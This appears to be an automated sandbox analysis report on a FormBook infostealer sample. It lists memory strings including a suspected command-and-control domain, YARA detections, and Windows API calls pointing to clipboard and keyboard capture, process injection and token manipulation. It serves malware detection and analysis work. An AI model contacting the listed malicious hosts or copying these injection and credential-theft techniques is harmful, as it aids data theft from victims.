73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
            Source: GtDTOqzvEb.exe, 00000008.00000002.3285172725.0000000004A9E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.astrafusion.xyz
            Source: GtDTOqzvEb.exe, 00000008.00000002.3285172725.0000000004A9E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.astrafusion.xyz/pcck/
            Source: clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: clip.exe, 00000005.00000002.3284516753.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000002.3283553222.0000000003674000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb
            Source: clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: clip.exe, 00000005.00000002.3284516753.00000000056CE000.00000004.10000000.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000002.3283553222.00000000031BE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat
            Source: clip.exe, 00000005.00000002.3281277788.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: clip.exe, 00000005.00000002.3281277788.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: clip.exe, 00000005.00000003.2097053025.000000000757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: clip.exe, 00000005.00000002.3281277788.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: clip.exe, 00000005.00000002.3281277788.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: clip.exe, 00000005.00000002.3281277788.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: clip.exe, 00000005.00000002.3281277788.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: GtDTOqzvEb.exe, 00000008.00000002.3283553222.00000000031BE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.strikingly.com/?utm_source=404&utm_medium=internal&utm_campaign=404_redirect
            Source: clip.exe, 00000005.00000002.3284516753.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000002.3283553222.0000000003674000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.tech
            Source: clip.exe, 00000005.00000002.3284516753.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000002.3283553222.0000000003674000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A3EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00A3EAFF
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A3ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00A3ED6A
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A3EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00A3EAFF
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A2AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00A2AA57
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A59576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00A59576

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1911428216.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3285172725.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3283463490.0000000004280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3283258223.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1912223834.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3282844800.0000000004B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1911428216.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3285172725.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3283463490.0000000004280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3283258223.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1912223834.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3282844800.0000000004B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: plZuPtZoTk.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: plZuPtZoTk.exe, 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_79534d3e-f
            Source: plZuPtZoTk.exe, 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3620d4cd-8
            Source: plZuPtZoTk.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_58f19739-4
            Source: plZuPtZoTk.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d3dcf8e9-8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C0F3 NtClose,2_2_0042C0F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B60 NtClose,LdrInitializeThunk,2_2_03B72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03B72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03B72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B735C0 NtCreateMutant,LdrInitializeThunk,2_2_03B735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74340 NtSetContextThread,2_2_03B74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74650 NtSuspendThread,2_2_03B74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BA0 NtEnumerateValueKey,2_2_03B72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B80 NtQueryInformationFile,2_2_03B72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BF0 NtAllocateVirtualMemory,2_2_03B72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BE0 NtQueryValueKey,2_2_03B72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AB0 NtWaitForSingleObject,2_2_03B72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AF0 NtWriteFile,2_2_03B72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AD0 NtReadFile,2_2_03B72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FB0 NtResumeThread,2_2_03B72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FA0 NtQuerySection,2_2_03B72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F90 NtProtectVirtualMemory,2_2_03B72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FE0 NtCreateFile,2_2_03B72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F30 NtCreateSection,2_2_03B72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F60 NtCreateProcessEx,2_2_03B72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EA0 NtAdjustPrivilegesToken,2_2_03B72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E80 NtReadVirtualMemory,2_2_03B72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EE0 NtQueueApcThread,2_2_03B72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E30 NtWriteVirtualMemory,2_2_03B72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DB0 NtEnumerateKey,2_2_03B72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DD0 NtDelayExecution,2_2_03B72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D30 NtUnmapViewOfSection,2_2_03B72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D10 NtMapViewOfSection,2_2_03B72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D00 NtSetInformationFile,2_2_03B72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CA0 NtQueryInformationToken,2_2_03B72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CF0 NtOpenProcess,2_2_03B72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CC0 NtQueryVirtualMemory,2_2_03B72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C00 NtQueryInformationProcess,2_2_03B72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C60 NtCreateKey,2_2_03B72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73090 NtSetValueKey,2_2_03B73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73010 NtOpenDirectoryObject,2_2_03B73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B739B0 NtGetContextThread,2_2_03B739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D10 NtOpenProcessToken,2_2_03B73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D70 NtOpenThread,2_2_03B73D70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04554650 NtSuspendThread,LdrInitializeThunk,5_2_04554650
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04554340 NtSetContextThread,LdrInitializeThunk,5_2_04554340
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_04552C70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552C60 NtCreateKey,LdrInitializeThunk,5_2_04552C60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_04552CA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552D10 NtMapViewOfSection,LdrInitializeThunk,5_2_04552D10
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_04552D30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552DD0 NtDelayExecution,LdrInitializeThunk,5_2_04552DD0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_04552DF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552EE0 NtQueueApcThread,LdrInitializeThunk,5_2_04552EE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_04552E80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552F30 NtCreateSection,LdrInitializeThunk,5_2_04552F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552FE0 NtCreateFile,LdrInitializeThunk,5_2_04552FE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552FB0 NtResumeThread,LdrInitializeThunk,5_2_04552FB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552AD0 NtReadFile,LdrInitializeThunk,5_2_04552AD0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552AF0 NtWriteFile,LdrInitializeThunk,5_2_04552AF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552B60 NtClose,LdrInitializeThunk,5_2_04552B60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04552BF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552BE0 NtQueryValueKey,LdrInitializeThunk,5_2_04552BE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_04552BA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045535C0 NtCreateMutant,LdrInitializeThunk,5_2_045535C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_045539B0 NtGetContextThread,LdrInitializeThunk,5_2_045539B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552C00 NtQueryInformationProcess,5_2_04552C00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552CC0 NtQueryVirtualMemory,5_2_04552CC0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552CF0 NtOpenProcess,5_2_04552CF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552D00 NtSetInformationFile,5_2_04552D00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552DB0 NtEnumerateKey,5_2_04552DB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552E30 NtWriteVirtualMemory,5_2_04552E30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552EA0 NtAdjustPrivilegesToken,5_2_04552EA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552F60 NtCreateProcessEx,5_2_04552F60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552F90 NtProtectVirtualMemory,5_2_04552F90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552FA0 NtQuerySection,5_2_04552FA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552AB0 NtWaitForSingleObject,5_2_04552AB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04552B80 NtQueryInformationFile,5_2_04552B80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04553010 NtOpenDirectoryObject,5_2_04553010
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04553090 NtSetValueKey,5_2_04553090
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04553D70 NtOpenThread,5_2_04553D70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_04553D10 NtOpenProcessToken,5_2_04553D10
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_00358B20 NtCreateFile,5_2_00358B20
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_00358C90 NtReadFile,5_2_00358C90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_00358D80 NtDeleteFile,5_2_00358D80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_00358E20 NtClose,5_2_00358E20
            Source: C:\Windows\SysWOW64\clip.exeCode function: 5_2_00358F90 NtAllocateVirtualMemory,5_2_00358F90
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A2D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00A2D5EB
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A21201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00A21201
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A2E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00A2E8F6
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A320460_2_00A32046
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009C80600_2_009C8060
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A282980_2_00A28298
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009FE4FF0_2_009FE4FF
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009F676B0_2_009F676B
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_00A548730_2_00A54873
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009ECAA00_2_009ECAA0
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009CCAF00_2_009CCAF0
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009DCC390_2_009DCC39
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009F6DD90_2_009F6DD9
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009C91C00_2_009C91C0
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009DB1190_2_009DB119
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009E13940_2_009E1394
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009E17060_2_009E1706
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009E781B0_2_009E781B
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009E19B00_2_009E19B0
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009C79200_2_009C7920
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009D997D0_2_009D997D
            Source: C:\Users\user\Desktop\plZuPtZoTk.exeCode function: 0_2_009E7A4A0_2_009E7A4A
